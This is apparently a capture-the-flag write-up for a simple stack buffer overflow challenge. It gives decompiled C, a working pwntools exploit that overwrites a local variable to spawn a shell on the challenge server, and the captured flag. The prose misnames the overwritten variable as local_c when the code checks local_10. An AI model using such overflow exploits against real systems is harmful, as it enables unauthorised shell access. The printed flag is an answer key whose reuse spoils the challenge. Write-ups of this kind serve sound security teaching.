Description
This should be easy!
nc dctf1-chall-pinch-me.westeurope.azurecontainer.io 7480
Preface
We got a binary file which asked us Am I dreaming? and with basic input prints then Pinch me!
Overview
Loading the binary into ghidra we can see, that the interaction happens in the function vuln
void vuln(void)
{
char local_28 [24];
int local_10;
int local_c;
local_c = 0x1234567;
local_10 = -0x76543211;
puts("Is this a real life, or is it just a fanta sea?");
puts("Am I dreaming?");
fgets(local_28,100,stdin);
if (local_10 == 0x1337c0de) {
system("/bin/sh");
}
else {
if (local_c == 0x1234567) {
puts("Pinch me!");
}
else {
puts("Pinch me harder!");
}
}
return;
}
Based on this, overwriting the local_c variable with 0x1337c0de gives me a shell.
This was pretty easy, I only needed to be careful to use the correct endianess. Pwntools provides a function to pack correctly.
My final exploit was.
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
vulnerable = './pinch_me'
#p = process( vulnerable )
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)
p.readuntil('Am I dreaming?')
p.sendline(b'\x41'*24 + p64(0x1337c0de))
#p.readuntil('will this work')
p.read( 2048, timeout=1 ) # cleanup output
p.interactive()
Then I just needed to print the file flag.txt
The flag was:
dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}